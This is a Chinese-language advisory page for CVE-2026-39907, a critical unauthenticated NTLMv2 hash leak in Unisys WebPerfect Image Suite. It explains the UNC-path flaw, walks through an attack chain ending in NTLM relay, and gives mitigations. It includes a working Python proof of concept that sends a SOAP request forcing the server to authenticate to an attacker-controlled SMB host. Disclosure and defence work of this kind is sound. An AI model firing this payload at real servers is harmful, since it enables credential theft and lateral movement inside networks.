CVE-2026-39907 CVSS 10.0 严重

CVE-2026-39907: Unisys WebPerfect NTLMv2哈希泄露漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39907

漏洞类型

信息泄露

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisys WebPerfect Image Suite

漏洞概述

Unisys WebPerfect Image Suite特定版本中存在一个严重的远程安全漏洞。该软件在TCP端口1208上暴露了一个未经身份验证的WCF SOAP接口。由于ReadLicense操作的LFName参数未对文件路径进行有效的安全过滤，攻击者可利用此缺陷传入恶意UNC路径。通过构造特制的SOAP请求，攻击者能够强制服务器向受控端点发起SMB连接，从而导致服务器的NTLMv2机器账户哈希泄露。攻击者可利用这些凭据进行进一步的权限提升或横向移动。

技术细节

该漏洞的核心机制在于Unisys WebPerfect Image Suite未对TCP 1208端口上的WCF SOAP端点实施身份验证保护。在处理ReadLicense请求时，系统直接获取LFName参数值并尝试读取文件，且未对路径格式进行校验。攻击者可以构建包含UNC路径（如\\attacker\share）的SOAP数据包发送至服务器。当服务器解析该请求时，会尝试连接攻击者指定的SMB共享以获取文件，从而触发NTLM认证流程。此过程导致服务器将NTLMv2哈希发送给攻击者。一旦捕获哈希，攻击者可利用NTLM Relay技术将其转发至域内其他服务（如LDAP或SMB），进而绕过认证获取系统权限，实现对内网的横向渗透。

攻击链分析

STEP 1

步骤1：侦察

攻击者扫描网络，发现目标主机TCP 1208端口开放的Unisys WebPerfect Image Suite服务。

STEP 2

步骤2：构造恶意请求

攻击者构造包含UNC路径（指向攻击者控制的SMB服务器）的SOAP请求，发送至ReadLicense端点。

STEP 3

步骤3：触发哈希泄露

服务器解析请求并尝试连接UNC路径，自动向攻击者发送NTLMv2认证哈希。

STEP 4

步骤4：权限提升

攻击者捕获哈希后，使用NTLM Relay攻击中继凭据，获取域内其他系统的访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_ip = "192.168.1.100"
attacker_ip = "192.168.1.200"
target_url = f"http://{target_ip}:1208/Service"

# SOAP payload with UNC path in LFName parameter
# This forces the server to connect back to the attacker via SMB
soap_payload = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ReadLicense xmlns="http://tempuri.org/">
      <LFName>\\\\{attacker_ip}\\share\\license.txt</LFName>
    </ReadLicense>
  </soap:Body>
</soap:Envelope>"""

headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "http://tempuri.org/IService/ReadLicense"
}

try:
    print(f"[*] Sending request to {target_url}...")
    response = requests.post(target_url, data=soap_payload, headers=headers, timeout=5)
    print(f"[*] Response status: {response.status_code}")
    print("[*] Check your SMB listener (e.g., Responder, impacket) for NTLMv2 hash.")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Unisys WebPerfect Image Suite 3.0.3960.22810

Unisys WebPerfect Image Suite 3.0.3960.22604

防御指南

临时缓解措施

建议立即在防火墙设备上封锁TCP 1208端口，以阻断未授权的WCF SOAP接口访问。同时，应配置Active Directory策略，强制要求SMB签名，并尽可能禁用NTLM认证，强制使用Kerberos，以降低凭据中继带来的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表